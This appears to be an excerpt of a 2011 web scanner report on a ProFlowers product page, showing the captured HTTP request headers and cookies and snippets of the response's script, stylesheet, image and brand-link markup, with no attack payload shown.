User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:50 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:08:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:51 GMT
Content-Length: 144498


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<p>
   1) Enable Javascript. To find out how: <A href="https://www.google.com/support/adsense/bin/answer.py?answer=12654" target="_blank">click here</a>
...[SNIP]...
</title>
<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_productdetail.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom_pfc.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />
       <meta id="_metaDescription" name="Description" content="Send flowers and gifts including Deluxe Mother...s Day Bouquet from ProFlowers.com. Flowers and gifts are available for any holiday or occas
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="innerContainer">
           <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="personalCreationLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a id="productDetailBody_ctl09__homeLink" border="0" title="Go to ProFlowers Homepage" href="http://www.proflowers.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef"><img class="PFLogo" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" style="border-width:0px;" /></a>
...[SNIP]...
<li><a class="headerLink" href="http://www.bridesign.com" target="_blank">Wedding</a>
...[SNIP]...
<div class="rushDeliveryBox StandardSize">Need it <a id="productDetailBody_ctl09_ctl91__repeater_ctl00__pcHyperLink" rel="nofollow" href="http://www.floristexpress.net?refcode=XSD&amp;RefPage=PFC_PRODUCT-30050137" target="_blank">Today</a>
...[SNIP]...
<a href="http://www.proflowers.com/radio/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef&amp;how=home"><img class="RadioIcon_Control" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="ProFlowers on the Radio" style="border-width:0px;" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</a> <a class="Lckdwn3_Nav_PFC_Mothers_Show" href="http://www.floristexpress.net?pfc=1&amp;refcode=MDN&amp;LinkLocation=NavBar">Mother's Day</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Occasion_Show"><a class="mothersDay" href="http://www.floristexpress.net?pfc=1&amp;refcode=OMD&amp;LinkLocation=NavBar">Mother's Day - 5/8</a>
...[SNIP]...
<li><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=PFC&amp;LinkLocation=NavBar">Local Florist Delivery</a>
...[SNIP]...
<li style="border-bottom:none;"><a class="wedding" href="http://www.bridesign.com" target="_blank">Wedding Flowers</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Hide"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=pfc&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Show"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?pfc=1&amp;refcode=FMD&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
Body_ctl09_ctl117_submit2" prvdid="productsearchlink" rel="nofollow" type="image" href="http://www.proflowers.com/ProductSearch.aspx?Ref=HomeNoRef" style="display:inline-block;height:18px;width:48px;"><img class="sch_smallGoBottom sch_smallGoBottomAlt" height="18px" width="48px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<div class="ProductInfoImage">
                           <img id="productDetailBody_productImage" class="productimagedimension" border="0" prvdid="productImage" RenderDivWhenInvisible="true" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=300&amp;hei=350" style="height:350px;width:300px;border-width:0px;" />
                       </div>
...[SNIP]...
<div id="productDetailBody_FlynnMagazeeny_divPicture" class="magPicture"> <img id="productDetailBody_FlynnMagazeeny_imgPicture" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/NTR_PD_Body_PFC_FLN_50_67_ReadersDigest_TB.gif" style="border-width:0px;" /> </div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shUpgradesHeader_image" class="Step_1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shMainAccessorySelectionHeader_image" class="Step_2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00__productImage" prvdid="productimage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00__productImage" prvdid="productimage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00__productImage" prvdid="productimage" class="selectedImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl03_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl03_ctl00__productImage" prvdid="productimage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl03_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td id="productDetailBody_accMainAccSelection_noAccHeight" align="center" style="height:88px;background-color:#FFFFFF;"><img id="productDetailBody_accMainAccSelection__pcImage2" prvdid="infoimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//images/noVase.gif" style="height:48px;width:47px;border-width:0px;" /></td>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shZipCodeHeader_image" class="Step_4" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shDeliveryDateSelectionHeader_image" class="Step_3" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl00__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30050137" target="_blank">Today</a>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl01__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30050137" target="_blank">Sunday</a>
...[SNIP]...
<td align="left" valign="top" style="width:28px;"><img id="productDetailBody_deliveryCalendar_Image1" class="calendar_button" prvdid="calendar_button" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/icon_Calendar_DeliveryTime.gif" src="" style="border-width:0px;margin-left:5px; cursor:pointer;" /></td>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl00__pcHyperLink" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30050137" target="_blank">Today</a>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl01__pcHyperLink" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30050137" target="_blank">Sunday</a>
...[SNIP]...
<div class="AccessoryImages">
       <img id="productDetailBody_accPreview_Repeater1_ctl00_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />
<img id="productDetailBody_accPreview_Repeater1_ctl01_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />

   </div>
...[SNIP]...
" vspace="3" href="http://products.proflowers.com/flowers/Deluxe-Hugs-and-Kisses-5519?trackingpgroup=YMA&amp;tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Deluxe Hugs and Kisses" style="border-width:0px;" /></a>
...[SNIP]...
space="3" href="http://products.proflowers.com/flowers/Mardi-Gras-Orchid-Garden-42864?trackingpgroup=YMA&amp;tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Mardi Gras Orchid Garden" style="border-width:0px;" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"><img id="productDetailBody_PCImage1" class="Ribbon25Mil" text="25 Million Orders Shipped" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
"text" value="Enter Your Email Here" id="productDetailBody_footer_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.prvd.com/Careers_Overview.aspx">CAREERS</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx">PRIVACY POLICY</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/terms.aspx">TERMS OF USE</a>
...[SNIP]...
</div><img class="shopOurBrandFamily" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" style="height:20px;width:181px;border-width:0px;" /> <br />
...[SNIP]...
itle="The freshest flowers, guaranteed to last at least 7 days." border="0" href="http://www.proflowers.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." style="border-width:0px;" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." style="border-width:0px;" /></a>
...[SNIP]...
itle="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" style="border-width:0px;" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." style="border-width:0px;" /></a> <a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." style="border-width:0px;" /></a> <a title="Unique personalized gifts for life...s special occasions." border="0" href="http://www.personalcreations.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." style="border-width:0px;" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." style="border-width:0px;" /></a>
...[SNIP]...
